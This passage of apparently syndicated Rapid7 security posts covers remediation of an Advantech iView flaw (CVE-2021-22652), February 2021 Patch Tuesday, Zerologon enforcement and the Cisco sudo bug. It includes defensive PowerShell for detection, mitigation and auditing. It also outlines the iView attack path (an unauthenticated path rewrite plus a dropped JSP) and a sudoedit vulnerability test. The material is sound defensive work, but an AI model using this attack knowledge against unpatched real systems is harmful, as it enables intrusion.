Exposure is limited by the fact that iView is usually deployed as an internal web application and its interface is rarely reachable from the internet, so an attacker would first need network access to the iView server. That said, it is a web application, and it is not hard to imagine a few instances being exposed to the public internet. Because both the version check and the configuration endpoints are unauthenticated, anyone who can reach the Tomcat port can run the whole chain above without credentials.

Once an attacker controls the iView server, they can manage the SmartWorx-enabled network devices it administers. Those are typically IoT devices, so a compromise of the management server can affect the physical infrastructure they control.

Remediating CVE-2021-22652

This issue was fixed in pre-release version 5.7.03.6112. Users who cannot update right away should ensure the iView web application is not reachable from untrusted networks, such as the internet. Since the attack works by rewriting the configured export path and dropping a JSP into the web root, it is also worth confirming that EXPORTPATH and the other path settings still point at their intended directories and that no unexpected .jsp files have appeared under webapps\iView3.
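To turn that advice into something you can run, the following PowerShell script is an added example (it is not from the Rapid7 write-up or from Advantech). It issues the same two unauthenticated, read-only requests shown above, reports whether the instance is below the fixed build, flags any configured path that is relative or points into Tomcat's webapps directory, and optionally lists the most recently written JSP files in the iView web root. It assumes iView answers at http://<host>:8080/iView3/ as in the write-up, that the version fragment has the exact "Version 5.7 (Build 0002.5992)" shape shown in the detection step, and that you supply the Tomcat folder yourself because its location varies by install. The script and parameter names are hypothetical.

```powershell
# Added example, not code from the Rapid7 write-up or from Advantech.
# Read-only exposure check for CVE-2021-22652 on an Advantech iView instance.
# Usage:  .\Check-IView.ps1 -IViewHost <ip-or-name> [-Port 8080] [-TomcatRoot <tomcat folder>]
# It reuses the two unauthenticated requests from the write-up (version.frag and
# retrieveSystemSettings) and never calls updateSystemSettings or exportInventoryTable.
param(
    [Parameter(Mandatory)] [string] $IViewHost,
    [int]    $Port = 8080,
    [string] $TomcatRoot = ''   # optional; enables the on-host JSP listing. Location varies by install.
)

$base  = "http://${IViewHost}:$Port/iView3"
$fixed = [version] '5.7.3.6112'   # first fixed build per the advisory (5.7.03.6112)

# 1. Version fingerprint, same request as the detection step. The fragment carries the
#    version in an <input value="Version 5.7 (Build 0002.5992)">; the pattern assumes that shape.
$versionHtml = (Invoke-WebRequest -UseBasicParsing -Method Post -Uri "$base/MenuServlet" `
    -Body @{ page_action_type = 'getMenuFragment'; page = 'version.frag' }).Content
if (-not ($versionHtml -match 'value="Version\s+(\d+)\.(\d+)\s+\(Build\s+(\d+)\.(\d+)\)"')) {
    throw "Could not parse the iView version fragment from $base/MenuServlet"
}
$installed = [version] ('{0}.{1}.{2}.{3}' -f [int]$Matches[1], [int]$Matches[2], [int]$Matches[3], [int]$Matches[4])

# 2. System settings, the same unauthenticated request as Step 1 of the exploit. The exploit's
#    footprint is a path setting pointed into Tomcat's webapps\ (relative paths resolve against
#    the Tomcat working directory), so that an "export" lands in the web root.
$raw = (Invoke-WebRequest -UseBasicParsing -Method Post -Uri "$base/NetworkServlet" `
    -Body @{ page_action_type = 'retrieveSystemSettings' }).Content
$cfg = @($raw | ConvertFrom-Json)[0]

$pathKeys = 'PROMPATH', 'EXPORTPATH', 'IMPORTPATH', 'CONFIGPATH', 'DBBACKUPPATH', 'ZTPTEMPLATESPATH'
$pathFindings = foreach ($key in $pathKeys) {
    $value       = [string] $cfg.$key
    $isRelative  = $value -notmatch '^[A-Za-z]:\\'      # no drive letter: resolves under Tomcat
    $isInWebapps = $value -match '(?i)\\webapps\\'      # anything under webapps\ is served by Tomcat
    if ($value -and ($isRelative -or $isInWebapps)) {
        [pscustomobject] @{ Setting = $key; Value = $value; Relative = $isRelative; InWebapps = $isInWebapps }
    }
}

# 3. Optional on-host check: the exploit drops its command stub as a .jsp in webapps\iView3
#    (x.jsp in the write-up), so the most recently written JSP files there deserve a look.
$recentJsp = @()
if ($TomcatRoot) {
    $webRoot   = Join-Path $TomcatRoot 'webapps\iView3'
    $recentJsp = Get-ChildItem -Path $webRoot -Filter *.jsp -Recurse -ErrorAction SilentlyContinue |
        Sort-Object LastWriteTime -Descending |
        Select-Object -First 10 -Property FullName, LastWriteTime, Length
}

[pscustomobject] @{
    Host             = $IViewHost
    InstalledVersion = $installed.ToString()
    FixedVersion     = $fixed.ToString()
    BelowFixedBuild  = ($installed -lt $fixed)
    PathFindings     = @($pathFindings)
    RecentJspFiles   = @($recentJsp)
}
```

A non-empty PathFindings list on a host whose administrators never changed those settings is a strong indicator that Step 2 of the chain above has already been run against it; treat the host as compromised rather than merely vulnerable and pull the Tomcat access logs for NetworkServlet requests before cleaning up.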

Disclosure timeline

  • Wednesday, Aug. 26, 2020: Issue discovered by William Vu of Rapid7.
  • Thursday, Aug. 27, 2020: Initial disclosure to ICS-CERT via the CISA Service Desk.
  • Monday, Nov. 9, 2020: ICS-CERT confirms receipt and assigns ICS-VU-820719.
  • Friday, Feb. 5, 2021: Draft advisory for ICSA-21-040-02 confirmed by Rapid7.
  • Tuesday, Feb. 9, 2021: ICS Advisory ICSA-21-040-02 published by CISA.
  • Thursday, Feb. 11, 2021: Rapid7 details on CVE-2021-22652 published.


Patch Tuesday – February 2021

Post Syndicated from Greg Wiseman original https://blog.rapid7.com/2021/02/09/patch-tuesday-february-2021/


The second Patch Tuesday of 2021 is relatively light on the vulnerability count, with 64 CVEs being addressed across the majority of Microsoft’s product families. Despite that, there’s still plenty to discuss this month.

Vulnerability Breakdown by Software Family

Family             | Vulnerability Count
Windows            | 28
ESU                | 14
Microsoft Office   | 11
Browser            | 9
Developer Tools    | 8
Microsoft Dynamics | 2
Exchange Server    | 2
Azure              | 2
System Center      | 2

Exploited and Publicly Disclosed Vulnerabilities

One zero-day was announced: CVE-2021-1732, an elevation of privilege vulnerability in the Win32k component of Windows 10 and Windows Server 2019 that Microsoft reports as exploited in the wild. Four vulnerabilities had been publicly disclosed before today's release: CVE-2021-1727, an elevation of privilege vulnerability in Windows Installer affecting all supported versions of Windows; CVE-2021-24098, a denial of service (DoS) in the Windows Console Driver affecting Windows 10 and Server 2019; CVE-2021-24106, an information disclosure vulnerability in DirectX on Windows 10 and Server 2019; and CVE-2021-26701, an RCE in .NET Core.

Vulnerabilities in Windows TCP/IP

Microsoft also disclosed a set of three serious vulnerabilities affecting the TCP/IP networking stack in all supported versions of Windows. Two of these (CVE-2021-24074 and CVE-2021-24094) carry a base CVSSv3 score of 9.8 and could allow Remote Code Execution (RCE). CVE-2021-24094 is specific to IPv6 link-local addresses, meaning it isn’t exploitable over the public internet. CVE-2021-24074, however, does not have this limitation. The third, CVE-2021-24086, is a DoS vulnerability that could allow an attacker to trigger a “blue screen of death” on any Windows system that is directly exposed to the internet, using only a small amount of network traffic. The RCE exploits are probably not a threat in the short term, due to the complexity of the vulnerabilities, but DoS attacks are expected to be seen much more quickly. Windows systems should be patched as soon as possible to protect against these.

If a patch cannot be applied immediately, for example on systems that cannot be rebooted, Microsoft has published mitigation guidance that protects against exploitation of the TCP/IP vulnerabilities and takes effect without a reboot. Depending on an asset's exposure, IPv4 source routing should be set to drop via Group Policy or a netsh command, and IPv6 packet reassembly should be disabled via a separate netsh command. IPv4 source-routing requests and IPv6 fragments can also be blocked at load balancers, firewalls, or other edge devices. Note that disabling IPv6 reassembly drops all out-of-order IPv6 fragments, which can break traffic that legitimately relies on fragmentation, so test it before rolling it out broadly.
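The following PowerShell script is an added example, not Microsoft's own guidance or script, that wraps the two netsh workarounds so they can be applied, verified and reverted consistently across hosts. It uses the netsh route only (not the Group Policy alternative), records each host's original values before changing them so a revert restores exactly what was there, and reports whether both settings are in their mitigated state. It assumes an English Windows build, because it parses the "Source Routing Behavior" and "Reassembly Limit" labels out of netsh's output; the script name, switches and state-file location are hypothetical.

```powershell
# Added example, not Microsoft's script. Applies, verifies, or reverts the two netsh
# workarounds Microsoft published for the February 2021 TCP/IP vulnerabilities.
# Usage (elevated):  .\Set-TcpipWorkaround.ps1          # report current state only
#                    .\Set-TcpipWorkaround.ps1 -Apply   # drop IPv4 source-routed packets
#                                                       # (CVE-2021-24074) and disable IPv6
#                                                       # reassembly (CVE-2021-24086/-24094)
#                    .\Set-TcpipWorkaround.ps1 -Revert  # restore the values saved by -Apply
# Neither netsh change needs a reboot. Caveat: with reassemblylimit=0 the stack drops every
# out-of-order IPv6 fragment, so anything that depends on fragmented IPv6 traffic can break;
# try it on a representative host before pushing it fleet-wide.
[CmdletBinding()]
param(
    [switch] $Apply,
    [switch] $Revert,
    [string] $StateFile = "$env:ProgramData\tcpip-workaround-state.json"   # assumed location
)

function Get-TcpipGlobals {
    # Pull the two values out of "netsh interface ipvX show global". The labels below are
    # what an English Windows build prints (the limit line ends in "bytes"); adjust the
    # patterns for other locales.
    $v4 = (netsh interface ipv4 show global) -join "`n"
    $v6 = (netsh interface ipv6 show global) -join "`n"
    $sourceRouting = $null
    if ($v4 -match 'Source Routing Behavior\s*:\s*(\S+)') { $sourceRouting = $Matches[1] }
    $reassemblyLimit = $null
    if ($v6 -match 'Reassembly Limit\s*:\s*(\d+)') { $reassemblyLimit = [int64] $Matches[1] }
    [pscustomobject] @{ SourceRouting = $sourceRouting; ReassemblyLimit = $reassemblyLimit }
}

if ($Apply -and $Revert) { throw 'Use either -Apply or -Revert, not both' }

if ($Apply) {
    # Save the current values first so -Revert restores exactly what this host had.
    Get-TcpipGlobals | ConvertTo-Json | Set-Content -Path $StateFile
    netsh interface ipv4 set global sourceroutingbehavior=drop | Out-Null
    netsh interface ipv6 set global reassemblylimit=0 | Out-Null
}
elseif ($Revert) {
    if (-not (Test-Path $StateFile)) { throw "No saved state at $StateFile; nothing to revert" }
    $saved = Get-Content -Raw -Path $StateFile | ConvertFrom-Json
    $v4Arg = "sourceroutingbehavior=$($saved.SourceRouting)"
    $v6Arg = "reassemblylimit=$($saved.ReassemblyLimit)"
    netsh interface ipv4 set global $v4Arg | Out-Null
    netsh interface ipv6 set global $v6Arg | Out-Null
}

$state = Get-TcpipGlobals
[pscustomobject] @{
    SourceRouting   = $state.SourceRouting     # 'drop' is the mitigated value
    ReassemblyLimit = $state.ReassemblyLimit   # 0 is the mitigated value
    Mitigated       = ($state.SourceRouting -eq 'drop' -and $state.ReassemblyLimit -eq 0)
}
```

Running the script with no switches is a cheap compliance check for a fleet: push it through your management tooling and collect the Mitigated field per host until the real patch has been applied, then run it with -Revert so the IPv6 fragment handling goes back to normal.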

Zerologon Update

Back in August 2020, Microsoft addressed a critical elevation of privilege vulnerability (CVE-2020-1472) in the Netlogon Remote Protocol (MS-NRPC), a.k.a. "Zerologon". In October, Microsoft noted that attacks exploiting this weakness had been seen in the wild. On January 14, 2021, they reminded organizations that the February 2021 security update bundle would also enable "Domain Controller enforcement mode" by default to fully address this weakness. Once enforced, any device that tries to establish a vulnerable Netlogon secure channel connection will be denied, unless its account is explicitly permitted through the "Domain controller: Allow vulnerable Netlogon secure channel connections" Group Policy, and any business-critical process that relies on these insecure connections will cease to function. Rapid7 encourages all organizations to heed Microsoft's detailed guidance before applying the latest updates to ensure business continuity.
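The practical question before applying this update is which devices will stop working. Domain controllers have been logging the answer since the August 2020 update: event IDs 5827 and 5828 in the System log (source NETLOGON) record vulnerable connections that were denied, 5829 records a vulnerable connection that was allowed because enforcement is still off, and 5830 and 5831 record connections allowed because the account is covered by the Group Policy exception. The following PowerShell script is an added example (not from the Rapid7 post or from Microsoft) that collects those events from each DC and summarizes them per account. It assumes the account name can be pulled from the message text after a "SamAccountName:" or "Trust Name:" label, as the event templates show; the script name and parameters are hypothetical.

```powershell
# Added example, not from the Rapid7 post or Microsoft's guidance. Lists the accounts still
# negotiating vulnerable Netlogon secure channels, i.e. what enforcement mode will cut off.
#   5827/5828 = vulnerable connection denied (machine / trust account)
#   5829      = vulnerable connection allowed (only logged while enforcement is off)
#   5830/5831 = allowed because the account is covered by the "Domain controller: Allow
#               vulnerable Netlogon secure channel connections" policy
# Usage:  .\Find-VulnerableNetlogon.ps1 -DomainController dc1,dc2 -Days 14
# Query every DC: each one only logs the secure channels it serviced itself.
param(
    [string[]] $DomainController = @($env:COMPUTERNAME),
    [int]      $Days = 7
)

$ids   = 5827, 5828, 5829, 5830, 5831
$since = (Get-Date).AddDays(-$Days)

$events = foreach ($dc in $DomainController) {
    $filter = @{ LogName = 'System'; ProviderName = 'NETLOGON'; Id = $ids; StartTime = $since }
    Get-WinEvent -ComputerName $dc -FilterHashtable $filter -ErrorAction SilentlyContinue |
        ForEach-Object {
            $evt = $_
            # The account is in the message body. The "SamAccountName:" / "Trust Name:" labels
            # are taken from the event templates (assumed); the raw message is kept as a fallback.
            $account = '<unparsed>'
            if ($evt.Message -match '(?:SamAccountName|Trust Name):\s*(\S+)') { $account = $Matches[1] }
            $outcome = switch ($evt.Id) {
                5827    { 'denied' }
                5828    { 'denied' }
                5829    { 'allowed-vulnerable' }
                default { 'allowed-by-policy' }
            }
            [pscustomobject] @{
                DC      = $dc
                Time    = $evt.TimeCreated
                Id      = $evt.Id
                Outcome = $outcome
                Account = $account
                Message = $evt.Message
            }
        }
}

# One row per account. An account that is currently 'allowed-vulnerable' and has no policy
# exception is exactly what will start failing once enforcement is on; fix the device's
# Netlogon implementation or add a deliberate, documented exception before patching.
$events | Group-Object Account | ForEach-Object {
    $group        = $_.Group
    $hasVuln      = [bool] ($group | Where-Object Outcome -eq 'allowed-vulnerable')
    $hasException = [bool] ($group | Where-Object Outcome -eq 'allowed-by-policy')
    [pscustomobject] @{
        Account       = $_.Name
        Events        = $_.Count
        LastSeen      = ($group | Sort-Object Time -Descending | Select-Object -First 1).Time
        WillBreak     = ($hasVuln -and -not $hasException)
        HasException  = $hasException
        AlreadyDenied = [bool] ($group | Where-Object Outcome -eq 'denied')
    }
} | Sort-Object WillBreak -Descending | Format-Table -AutoSize
```

An empty result across all DCs for a window that covers your longest service cycle (a week is usually enough, but include month-end batch jobs) is the signal that enforcement can go in without surprises.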

Adobe

Most important among the six security advisories Adobe published today is APSB21-09, which details 23 CVEs affecting Adobe Acrobat and Reader. Six of these are rated Critical and allow arbitrary code execution, and one of them (CVE-2021-21017) has been seen exploited in the wild in attacks targeting Adobe Reader users on Windows.

Summary Tables

Azure Vulnerabilities

CVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ?
CVE-2021-24109 | Microsoft Azure Kubernetes Service Elevation of Privilege Vulnerability | No | No | 6.8 | Yes
CVE-2021-24087 | Azure IoT CLI extension Elevation of Privilege Vulnerability | No | No | 7.0 | Yes

Browser Vulnerabilities

CVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ?
CVE-2021-24100 | Microsoft Edge for Android Information Disclosure Vulnerability | No | No | 5.0 | Yes
CVE-2021-24113 | Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability | No | No | 4.6 | Yes
CVE-2021-21148 | Chromium CVE-2021-21148: Heap buffer overflow in V8 | N/A | N/A | N/A | Yes
CVE-2021-21147 | Chromium CVE-2021-21147: Inappropriate implementation in Skia | N/A | N/A | N/A | Yes
CVE-2021-21146 | Chromium CVE-2021-21146: Use after free in Navigation | N/A | N/A | N/A | Yes
CVE-2021-21145 | Chromium CVE-2021-21145: Use after free in Fonts | N/A | N/A | N/A | Yes
CVE-2021-21144 | Chromium CVE-2021-21144: Heap buffer overflow in Tab Groups | N/A | N/A | N/A | Yes
CVE-2021-21143 | Chromium CVE-2021-21143: Heap buffer overflow in Extensions | N/A | N/A | N/A | Yes
CVE-2021-21142 | Chromium CVE-2021-21142: Use after free in Payments | N/A | N/A | N/A | Yes

Developer Tools Vulnerabilities

CVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ?
CVE-2021-26700 | Visual Studio Code npm-script Extension Remote Code Execution Vulnerability | No | No | 7.8 | Yes
CVE-2021-1639 | Visual Studio Code Remote Code Execution Vulnerability | No | No | 7.0 | No
CVE-2021-1733 | Sysinternals PsExec Elevation of Privilege Vulnerability | No | Yes | 7.8 | Yes
CVE-2021-24105 | Package Managers Configurations Remote Code Execution Vulnerability | No | No | 8.4 | Yes
CVE-2021-24111 | .NET Framework Denial of Service Vulnerability | No | No | 7.5 | No
CVE-2021-1721 | .NET Core and Visual Studio Denial of Service Vulnerability | No | Yes | 6.5 | No
CVE-2021-26701 | .NET Core Remote Code Execution Vulnerability | No | Yes | 8.1 | Yes
CVE-2021-24112 | .NET Core Remote Code Execution Vulnerability | No | No | 8.1 | Yes

ESU Windows Vulnerabilities

CVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ?
CVE-2021-24080 | Windows Trust Verification API Denial of Service Vulnerability | No | No | 6.5 | No
CVE-2021-24074 | Windows TCP/IP Remote Code Execution Vulnerability | No | No | 9.8 | Yes
CVE-2021-24094 | Windows TCP/IP Remote Code Execution Vulnerability | No | No | 9.8 | Yes
CVE-2021-24086 | Windows TCP/IP Denial of Service Vulnerability | No | No | 7.5 | Yes
CVE-2021-1734 | Windows Remote Procedure Call Information Disclosure Vulnerability | No | No | 7.5 | Yes
CVE-2021-25195 | Windows PKU2U Elevation of Privilege Vulnerability | No | No | 7.8 | Yes
CVE-2021-24088 | Windows Local Spooler Remote Code Execution Vulnerability | No | No | 8.8 | No
CVE-2021-1727 | Windows Installer Elevation of Privilege Vulnerability | No | Yes | 7.8 | No
CVE-2021-24077 | Windows Fax Service Remote Code Execution Vulnerability | No | No | 9.8 | Yes
CVE-2021-1722 | Windows Fax Service Remote Code Execution Vulnerability | No | No | 8.1 | Yes
CVE-2021-24102 | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No
CVE-2021-24103 | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No
CVE-2021-24078 | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes
CVE-2021-24083 | Windows Address Book Remote Code Execution Vulnerability | No | No | 7.8 | No

Exchange Server Vulnerabilities

CVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ?
CVE-2021-24085 | Microsoft Exchange Server Spoofing Vulnerability | No | No | 6.5 | Yes
CVE-2021-1730 | Microsoft Exchange Server Spoofing Vulnerability | No | No | 5.4 | Yes

Microsoft Dynamics Vulnerabilities

CVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ?
CVE-2021-1724 | Microsoft Dynamics Business Central Cross-site Scripting Vulnerability | No | No | 6.1 | No
CVE-2021-24101 | Microsoft Dataverse Information Disclosure Vulnerability | No | No | 6.5 | Yes

Microsoft Office Vulnerabilities

CVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ?
CVE-2021-24073 | Skype for Business and Lync Spoofing Vulnerability | No | No | 6.5 | No
CVE-2021-24099 | Skype for Business and Lync Denial of Service Vulnerability | No | No | 6.5 | No
CVE-2021-24114 | Microsoft Teams iOS Information Disclosure Vulnerability | No | No | 5.7 | Yes
CVE-2021-1726 | Microsoft SharePoint Spoofing Vulnerability | No | No | 8.0 | Yes
CVE-2021-24072 | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 8.8 | No
CVE-2021-24066 | Microsoft SharePoint Remote Code Execution Vulnerability | No | No | 8.8 | Yes
CVE-2021-24071 | Microsoft SharePoint Information Disclosure Vulnerability | No | No | 5.3 | Yes
CVE-2021-24067 | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes
CVE-2021-24068 | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes
CVE-2021-24069 | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes
CVE-2021-24070 | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes

System Center Vulnerabilities

CVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ?
CVE-2021-1728 | System Center Operations Manager Elevation of Privilege Vulnerability | No | No | 8.8 | Yes
CVE-2021-24092 | Microsoft Defender Elevation of Privilege Vulnerability | No | No | 7.8 | Yes

Windows Vulnerabilities

CVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ?
CVE-2021-1732 | Windows Win32k Elevation of Privilege Vulnerability | Yes | No | 7.8 | No
CVE-2021-1698 | Windows Win32k Elevation of Privilege Vulnerability | No | No | 7.8 | No
CVE-2021-24075 | Windows Network File System Denial of Service Vulnerability | No | No | 6.8 | No
CVE-2021-24084 | Windows Mobile Device Management Information Disclosure Vulnerability | No | No | 5.5 | Yes
CVE-2021-24096 | Windows Kernel Elevation of Privilege Vulnerability | No | No | 7.8 | No
CVE-2021-24093 | Windows Graphics Component Remote Code Execution Vulnerability | No | No | 8.8 | Yes
CVE-2021-24106 | Windows DirectX Information Disclosure Vulnerability | No | Yes | 5.5 | Yes
CVE-2021-24098 | Windows Console Driver Denial of Service Vulnerability | No | Yes | 5.5 | Yes
CVE-2021-24091 | Windows Camera Codec Pack Remote Code Execution Vulnerability | No | No | 7.8 | No
CVE-2021-24079 | Windows Backup Engine Information Disclosure Vulnerability | No | No | 5.5 | Yes
CVE-2021-1731 | PFX Encryption Security Feature Bypass Vulnerability | No | No | 5.5 | Yes
CVE-2021-24082 | Microsoft.PowerShell.Utility Module WDAC Security Feature Bypass Vulnerability | No | No | 4.3 | No
CVE-2021-24076 | Microsoft Windows VMSwitch Information Disclosure Vulnerability | No | No | 5.5 | Yes
CVE-2021-24081 | Microsoft Windows Codecs Library Remote Code Execution Vulnerability | No | No | 7.8 | No

Summary Charts

(Four summary charts appear in the original post, each captioned "Patch Tuesday - February 2021".)

Note: Chart data is reflective of data presented by Microsoft’s CVRF at the time of writing.

Cisco Patches Recently Disclosed “sudo” Vulnerability (CVE-2021-3156) in Multiple Products

Post Syndicated from boB Rudis original https://blog.rapid7.com/2021/02/04/cisco-patches-recently-disclosed-sudo-vulnerability-cve-2021-3156-in-multiple-products/


While Punxsutawney Phil may have said we only have six more weeks of winter, the need to patch software and hardware weaknesses will, unfortunately, never end.

Cisco has released security updates addressing vulnerabilities across most of its product portfolio. Some of these may be exploited to gain full system or device control on certain devices, and one fixes the recently disclosed sudo vulnerability. We discuss that one below, but there are many more lower-severity, or "valid administrator credentials required", bugs on the Cisco Security Advisories page that every organization using Cisco products should review.

Getting back to RBAC


The "sudo" advisory is officially titled "Sudo Privilege Escalation Vulnerability Affecting Cisco Products: January 2021" and covers pretty much every Cisco product that has a command line interface. It addresses CVE-2021-3156 (also known as "Baron Samedit"), the heap-based buffer overflow in sudo that affects any system shipping a vulnerable sudo build, not just Cisco gear.

According to the advisory, the vulnerability is due to “improper parsing of command line parameters that may result in a heap-based buffer overflow. An attacker could exploit this vulnerability by accessing a Unix shell on an affected device and then invoking the sudoedit command with crafted parameters or by executing a binary exploit.”

All commands invoked after exploiting this vulnerability run with root privileges. Where you do have a Unix shell on a device, the quick test published alongside the bug applies: run sudoedit -s / as an unprivileged user. A patched sudo prints its usage message, while a vulnerable one prints an error line beginning with sudoedit:, because the crafted -s flag sends it down the vulnerable code path.

This weakness will also enable lower-privileged users with access to Cisco devices to elevate their privileges, meaning you technically are out of compliance with any role-based access control requirement (which is in virtually every modern cybersecurity compliance framework).

Rapid7 strongly advises organizations to patch this weakness as soon as possible to stop attackers and curious users from taking control of your network, as well as ensuring you are able to continue checking ✅ this particular compliance box. Even though we mentioned it at the top of the post, don’t forget to check out the rest of the Cisco security advisories to see whether you need to address weaknesses in any of your other Cisco devices.
